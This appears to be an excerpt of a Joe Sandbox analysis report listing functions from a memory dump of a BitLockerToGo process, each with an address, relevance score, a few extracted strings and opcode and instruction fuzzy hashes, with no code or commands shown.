Strings

4`[b, xrefs: 00440AA0

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b
API String ID: 0-3962175265
Opcode ID: daa2fd5d010cf301e6fa969ec57fbd80e11ba9faa47cb04097df5c1a554ce979
Instruction ID: 99a01583236dce0077b088ed95dbf41f23ce3a515ec20c5eb357c5d339b3aacd
Opcode Fuzzy Hash: daa2fd5d010cf301e6fa969ec57fbd80e11ba9faa47cb04097df5c1a554ce979
Instruction Fuzzy Hash: 5551E27161C340DFE310CF68E89072BB7E1EB9531AF14893DE68597292D339E815CB6A

Function 0044B3C0 Relevance: 1.4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

Strings

%&' , xrefs: 0044B4B3, 0044B4BB

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: ebceecb205e9d2079f6b9556a04ad268136be13b113c9065739bea625c7104db
Instruction ID: 17bd6b77d8afc3206dcbb30043e20050abcc6c0c2a070aeb5ff43bd68b1bd22e
Opcode Fuzzy Hash: ebceecb205e9d2079f6b9556a04ad268136be13b113c9065739bea625c7104db
Instruction Fuzzy Hash: F341B274608300ABE7249F14D980B2FF7E5EF85718F24982EF98557352D338D810CB9A

Function 0044B550 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

%&' , xrefs: 0044B584, 0044B58D

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: %&'
API String ID: 0-1807952111
Opcode ID: 30a29aeb61bf984d19e2b00b639fecbfaec815f8226cebbd515321501780186c
Instruction ID: 29b07a6ef093497e52b67b2f99bf72fce2ef51d58a7dfb2ceacaca25a9ffeacd
Opcode Fuzzy Hash: 30a29aeb61bf984d19e2b00b639fecbfaec815f8226cebbd515321501780186c
Instruction Fuzzy Hash: 45417E74609300ABE7249F14D990B2FFBF5EF85714F25982EE98857352D335D810CB9A

Function 00433B19 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

y:C, xrefs: 00433BD0

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: y:C
API String ID: 0-1847411870
Opcode ID: 86e845f1588b990b909c2e9ac42db068c0457f420b0e37bba9d31d122303a98c
Instruction ID: 45afc1d9ff2c634722ce7bdcd725c26c9da6121357d2393398959779dc429093
Opcode Fuzzy Hash: 86e845f1588b990b909c2e9ac42db068c0457f420b0e37bba9d31d122303a98c
Instruction Fuzzy Hash: C731D4352187028FE76C8E34C86633676A0EB08366F15D97ED1A7C3692DB3EE6408B04

Function 0044440C Relevance: 1.3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

Strings

HDD, xrefs: 00444406

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: HDD
API String ID: 0-1684802274
Opcode ID: 5c31a69fca6e1745edb9f15046dac8b19be76047795d04ec94c2566d99be06f5
Instruction ID: 6f1924b669febd39baf395bc6409ba02200feb49bda3f4bd527b747227cc367d
Opcode Fuzzy Hash: 5c31a69fca6e1745edb9f15046dac8b19be76047795d04ec94c2566d99be06f5
Instruction Fuzzy Hash: C301F63550C2808BE302BF58D580A2DFBF5EB66706F544D1EE5C193212D32AD821DB2B

Function 004443D4 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

HDD, xrefs: 00444406

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID: HDD
API String ID: 0-1684802274
Opcode ID: e1e9dea81a04be77dae025c329ed78862b89a21fbefacd01b276ace1f752fff7
Instruction ID: 3bf1d2f4deafb408f911d3c84265c4c206cc2bca21ffd8befcfd530c2d324818
Opcode Fuzzy Hash: e1e9dea81a04be77dae025c329ed78862b89a21fbefacd01b276ace1f752fff7
Instruction Fuzzy Hash: 27E0B63490D2808BD301BB58958082DFBF5AB66606F545D1EE1C193212D225D8218B2B

Function 0040BDF0 Relevance: .9, Instructions: 857COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: add3e39a53258ab8b8ef9551874f5d74d55d95f1ad57cea6beb11c9efea628c2
Instruction ID: 20436d9e8346f00453c952cdd1ab9798c66c9bd2be42612087c18c84e2ebb499
Opcode Fuzzy Hash: add3e39a53258ab8b8ef9551874f5d74d55d95f1ad57cea6beb11c9efea628c2
Instruction Fuzzy Hash: 6B528D31508311CBC725DF18D88066BB3E2FFD4314F298A3ED9D6A7295D739A851CB8A

Function 0040915E Relevance: .8, Instructions: 806COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24cbbe1c5458552d5288e6a4d76fcb18b055ff56c274e099ebd496108fb45795
Instruction ID: b25dfe9c3ec25d8b74e34d4c5b8fdead7de8eaf0f9c584e24d3ebebb76c6c129
Opcode Fuzzy Hash: 24cbbe1c5458552d5288e6a4d76fcb18b055ff56c274e099ebd496108fb45795
Instruction Fuzzy Hash: F5726679600701CFD724CF29D880B56BBF2BB48315F08897DE9868B6A2D335E995CF94

Function 0040B2E0 Relevance: .7, Instructions: 670COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b8ea3d96a527aa5c226737e8d6cd216c54ba02daf91f3bf995ba8a9f4b3c87e
Instruction ID: c5b1b64b38e4b916dfc7e79bc80f4c277f0a7e5eb58f04f28514f0c1b49f29bf
Opcode Fuzzy Hash: 8b8ea3d96a527aa5c226737e8d6cd216c54ba02daf91f3bf995ba8a9f4b3c87e
Instruction Fuzzy Hash: FD52AF70908B889FE7358F24C4847A7BBE1EB95314F14487EC5E616BC2D37DA885878E

Function 00407340 Relevance: .7, Instructions: 657COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
Instruction ID: cee1bf95d0cce40876d0d238e600a92735bf6d9b2aaa7fb5aed5c5127efacff1
Opcode Fuzzy Hash: cc0350b755ec659348fbe488e8fd628042ee9f5c1c3e63c7348debc874760767
Instruction Fuzzy Hash: 8752D57190C3458FDB14CF18C0906AABBE1FF85314F198A7EE89967381D778E845CB86

Function 00449FC0 Relevance: .6, Instructions: 628COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83dd7b2af121a5187c8d4d537aea2e7d1c6c0a5b9c0d112ca76c8a8c6e1fb9e
Instruction ID: fccf1189b0863037d8e8900df906035fd11b7bc0dde9992cf58da4bc5c5a804d
Opcode Fuzzy Hash: d83dd7b2af121a5187c8d4d537aea2e7d1c6c0a5b9c0d112ca76c8a8c6e1fb9e
Instruction Fuzzy Hash: C912FF31A08251CFDB04CF68E89066EB7F1FF49316F19886EE98597362C335E950CB96

Function 00407D40 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748011adee3ce26e677debc18fa99b4f8c0e3ab68925280b2ea0a652b43009f2
Instruction ID: 1cb7f36cac646756863774b5f87a9471b7b821585ea8a173391c375642cf29a5
Opcode Fuzzy Hash: 748011adee3ce26e677debc18fa99b4f8c0e3ab68925280b2ea0a652b43009f2
Instruction Fuzzy Hash: AB323370914B118FC368CF29C69052ABBF1BF85710B604A2ED6D797B90DB3AF845CB19

Function 0044A130 Relevance: .5, Instructions: 529COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be775971ea42da60b6da0e76b725f47c7ef9fe1381c3ef235132ef468db6b6e8
Instruction ID: cc7fc07ef370697de78976d8fe6735b00f46c5e557697d4384981c7448859124
Opcode Fuzzy Hash: be775971ea42da60b6da0e76b725f47c7ef9fe1381c3ef235132ef468db6b6e8
Instruction Fuzzy Hash: FBF1DF31A08251CFDB04CF68D890A6EB7B2FF49306F19887DE58597352C335E854CB9A

Function 0044A19B Relevance: .5, Instructions: 495COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1a420550d9eae8139cf3c5add5afcd58d3c72b0a4fdfbbbd0ad01d90f62d4a7
Instruction ID: 1b26ac307edeb3d5c9470eeb1a81b714e5c915aaabc0f48bd83e8729dff1ddcd
Opcode Fuzzy Hash: a1a420550d9eae8139cf3c5add5afcd58d3c72b0a4fdfbbbd0ad01d90f62d4a7
Instruction Fuzzy Hash: 11E1F032A08211CFDB04CF68E890ABEB7B2FF49316F198479E54597362C335E855CB99

Function 004155DC Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0073ac2c3844e577d0333fb71f811e74d77135725a6e1f386561c47f72772ac
Instruction ID: f1ea40bff2c0c241d817df3f08225dcf85b560d4682108e800bd54e0cb7ce5b3
Opcode Fuzzy Hash: d0073ac2c3844e577d0333fb71f811e74d77135725a6e1f386561c47f72772ac
Instruction Fuzzy Hash: 50F1C071508301DBC714DB24D880AABB7E2EFC8715F184A2EF48597391E778EC85CB5A

Function 0044A320 Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23006e091cf2fd6a0dc701934ada266b66310155111ff02edac393d5469ffd51
Instruction ID: 6e459177b9cb25b95bbc3fd0d8c32231df62b736640ac154c6f5cb01c203fdaa
Opcode Fuzzy Hash: 23006e091cf2fd6a0dc701934ada266b66310155111ff02edac393d5469ffd51
Instruction Fuzzy Hash: 10C1CC36A04215CFDB04CFA8D890AAEB7B2FF49316F198479E905A7362C334E955CB94

Function 0040A2F0 Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854fd94e71d91bfafac577931fd31304f364c99ab11e547b5df4d1ad82f33588
Instruction ID: e6c31efc5e5df7a4e8a3ad262abe02f960586853a6c81a09028986aa844e76a9
Opcode Fuzzy Hash: 854fd94e71d91bfafac577931fd31304f364c99ab11e547b5df4d1ad82f33588
Instruction Fuzzy Hash: A1E18B75108341DFC720DF29C880A6BBBE1EF99300F44892EE4D597792E279E958CB97

Function 00437020 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb8590b0ec6ec77a633e4fd323862a15354c9cd3f24e1fab67919785b8c7fc31
Instruction ID: dc3439653b933048f3617ac64f484f0e91a949014f197010bd7991ddf7b88586
Opcode Fuzzy Hash: eb8590b0ec6ec77a633e4fd323862a15354c9cd3f24e1fab67919785b8c7fc31
Instruction Fuzzy Hash: B9C12B73B099814BD7288D7D8C512BEBA935BDA330F3D937EE9B29B3D1C62948024355

Function 00449480 Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ee8bd53761b9219b1cdb6ac35da62c7bde73b0a3b38b73338a0c231b155099
Instruction ID: d3b090544d6f205e22728e54342e22d424e706b12399ffc6a235ba8e98fbc19b
Opcode Fuzzy Hash: 82ee8bd53761b9219b1cdb6ac35da62c7bde73b0a3b38b73338a0c231b155099
Instruction Fuzzy Hash: 55A105B19083509BF714AF29DC81B6BB7E5ABC5318F09092EF99497342E639DC088796

Function 0040AE50 Relevance: .3, Instructions: 305COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01c3c57b2eb9a433a43a0fdb6e8d2367da762c73b942ca38a1c29261b1875226
Instruction ID: 276e2164b591ca48591a74de295b27b01baa5bf4e1a2aa437fb80f9a58e30636
Opcode Fuzzy Hash: 01c3c57b2eb9a433a43a0fdb6e8d2367da762c73b942ca38a1c29261b1875226
Instruction Fuzzy Hash: 6CC170B2A087418FC374CF68C8567ABB7E0FF85318F08492DD5DAD6382D778A5458B4A

Function 00409D09 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e79d5c697138f874bfcb552632fabf3aea0b66d17ea457ac5990d6f7577eb4b3
Instruction ID: 062b217ffd895aa3575025e6ffb0c9ae88be43a303221a55f7659f90ea27f8ec
Opcode Fuzzy Hash: e79d5c697138f874bfcb552632fabf3aea0b66d17ea457ac5990d6f7577eb4b3
Instruction Fuzzy Hash: 77B17835209781DFC715CF29D880556BFA2BFA9300758C6ACD8864BB97C630F965CBA1

Function 0044A9A2 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d31c1a0b507502df813c57786b6807716d0a2d9222ea086b0600ba08d396d6
Instruction ID: 5b67505b45df0cb1507b5727d3df8124768f61acb20bf7a80a10b9730ab25676
Opcode Fuzzy Hash: b5d31c1a0b507502df813c57786b6807716d0a2d9222ea086b0600ba08d396d6
Instruction Fuzzy Hash: B851F231618741CFD704EF28D5A162FB7E2EB8A315F09887EE58687392D735E910CB46

Function 0042DB06 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de299eba89f0c19e394d1f656505bd17eb855f9efe6fc63939162937ba26161a
Instruction ID: 421bdcd27fe78e30c72dd0b327cb264254511557c7b2d04b94e825b06fbe6dd0
Opcode Fuzzy Hash: de299eba89f0c19e394d1f656505bd17eb855f9efe6fc63939162937ba26161a
Instruction Fuzzy Hash: 01510773E14B214BC725CE28D89066AB6D2ABC8214F9E873DD899DB385DA34EC0587C4

Function 00445CE0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b6667dbf8181f64083e8cd94cbc28830c4fe16091e7bd9176ddb86cbf58c490
Instruction ID: 10996e009e36544058cf23e3fb3d6e42a0c6574222f5b09a0015922c2bfaf0bd
Opcode Fuzzy Hash: 9b6667dbf8181f64083e8cd94cbc28830c4fe16091e7bd9176ddb86cbf58c490
Instruction Fuzzy Hash: 1D71B17060C7419BEB109F15D880B2BB7E6EF95314F68892EE9C587392D339DD01CB5A

Function 0040E290 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb5748937d012daf426853e0392d35d1f5eb027f722980cd61082957ba6c6f2
Instruction ID: f2a3d1b74463da516d97f09140a8c4f9bb81b6384485c0b091baf00576cfb5f8
Opcode Fuzzy Hash: abb5748937d012daf426853e0392d35d1f5eb027f722980cd61082957ba6c6f2
Instruction Fuzzy Hash: A65164337195904BD728893E5C5226A7E831FD2334B2D8B7AE5F5973E1C57D8812520A

Function 0043F4C0 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b472f3559058ea0be97f9a15bfb05f851a4428769a15400e67acb9f2c7a09f
Instruction ID: f6abc0af7ca32997e9cafc4e2e34183b28ca1669ff29ec39248166c36e0a6de6
Opcode Fuzzy Hash: 51b472f3559058ea0be97f9a15bfb05f851a4428769a15400e67acb9f2c7a09f
Instruction Fuzzy Hash: 24516DB19087548FE314DF29D49435BBBE1BBC8318F054A2EE5E987351E379DA088F86

Function 00444B80 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: effe6eac9f311c758e446725bfdf13fb31bb05e9cb34c2140fc99ee66a75e0c0
Instruction ID: 7ad316b73390276132a4ab6c9faa8dd89d791f65897074b9123a9ee69be1a1d1
Opcode Fuzzy Hash: effe6eac9f311c758e446725bfdf13fb31bb05e9cb34c2140fc99ee66a75e0c0
Instruction Fuzzy Hash: 6B51B1706092409BE724DF59D980B2BBBE5EFC5305F18882EE9C987352D739DC10DB6A

Function 00405B90 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca578b71dd7e0464b9468ab5a7e3ca3ca7f28ed2fa8f023d8c9a9c3f49dccc7
Instruction ID: 1d9968dd26ca2ca5dda59581a8cfd0d85ce5bca577229d9139ebabca2910c23a
Opcode Fuzzy Hash: 7ca578b71dd7e0464b9468ab5a7e3ca3ca7f28ed2fa8f023d8c9a9c3f49dccc7
Instruction Fuzzy Hash: 2B51B1B4A087009FC714DF14C48092BB7A1FF85324F15467EE896AB392D635EC41CF96

Function 00410FD0 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c7d75a73d6248063d5ecae19b33c4bf3bb70b2830c8e94af99334a99f9bd95b
Instruction ID: 98257e466bb2e7aa329bd52a62fe72dee4a5aab4042d02c6972750efca12d7e7
Opcode Fuzzy Hash: 7c7d75a73d6248063d5ecae19b33c4bf3bb70b2830c8e94af99334a99f9bd95b
Instruction Fuzzy Hash: 38411432A182A00FD318CE3A889016ABBD2ABC5210F19C77EF1A5C7795E679C986D751

Function 0043FC70 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb3e03c891cbf07d93c7ef9684f0cbe13dab39e75820283f04618ad205476312
Instruction ID: 8c929e5f75471456ade4624ce6f1f5adad10882554212a37454d2bd6bfaf1b39
Opcode Fuzzy Hash: bb3e03c891cbf07d93c7ef9684f0cbe13dab39e75820283f04618ad205476312
Instruction Fuzzy Hash: 6121F532D081145BC3249B59D88553BF7E4FB9E705F16A62FD88497294E3389C2887E5

Function 00444740 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039c61829b77764153775b0d63d25acc06e0d6c8f291c6125b4aceaf4c91055b
Instruction ID: 865a7879fa48ecea340c19b0843a3a6debac6e987e2a5b1b187a2e7368afc354
Opcode Fuzzy Hash: 039c61829b77764153775b0d63d25acc06e0d6c8f291c6125b4aceaf4c91055b
Instruction Fuzzy Hash: ED313B745083809BE310EF19D584B1BBBE6EBC5718F14C82EE58887252D37AD805DBAA

Function 00404B00 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de877aee7ae06589233cb5ca6bf73c3118cf275ac82391d4fc92f3fadf974ea3
Instruction ID: c000309333387e9485bc883ad14fa09d7964f5de451f35db532e0c65e474cb2c
Opcode Fuzzy Hash: de877aee7ae06589233cb5ca6bf73c3118cf275ac82391d4fc92f3fadf974ea3
Instruction Fuzzy Hash: D831A9B17042059BD7149E29C880B27B7F5EFC4358F14853EE999A73C1D239EC42CB4A

Function 0043BBD0 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 6d695988f86f71ba6e781c929afd284e505dcd315a96d61d491af57265f4928b
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: E7112C336041D40EC3218D3C8440675BF934A97234F19A39FF5B89B2D2DB268D8B8399

Function 00430740 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecd1f6e2d676866fbf554d9f137e1025c437ba9fc2c32983e13de9ca9aa8a82d
Instruction ID: dc8aeb5ce0cbbeda24419c7a9f96c8b2fa4868b04b935ff546c46fd2def2d299
Opcode Fuzzy Hash: ecd1f6e2d676866fbf554d9f137e1025c437ba9fc2c32983e13de9ca9aa8a82d
Instruction Fuzzy Hash: 860171F560030187D7209F6694E1727F2A96F88708F18663EE80857342DB7AFC098ED9

Function 00445F60 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fcc9ea26c4775e2bfafbcd3611836e0ee3259f126d994835429f450f94fb219
Instruction ID: 2546fe87bbd49b9d0c1046a38d5f0c01e4b2710b488b9344f7035896c3a6c4b2
Opcode Fuzzy Hash: 2fcc9ea26c4775e2bfafbcd3611836e0ee3259f126d994835429f450f94fb219
Instruction Fuzzy Hash: 0611497141A380ABE744DFA8958492FFBE5AB85B08F901C2DF8819B342D735C909CB5B

Function 00407000 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bca8451c7a21ffdc08514427d5aae7525460325ea45c90652cec291e1702db1
Instruction ID: ba151a886682c9b4a4314b8abeb90201305353076193554b31bcf3f8554cac74
Opcode Fuzzy Hash: 2bca8451c7a21ffdc08514427d5aae7525460325ea45c90652cec291e1702db1
Instruction Fuzzy Hash: 02F08B36B582160BD318CE65ECE0D77B356D7C7205B09013ED642E3381CD71F805D269

Function 0041A780 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
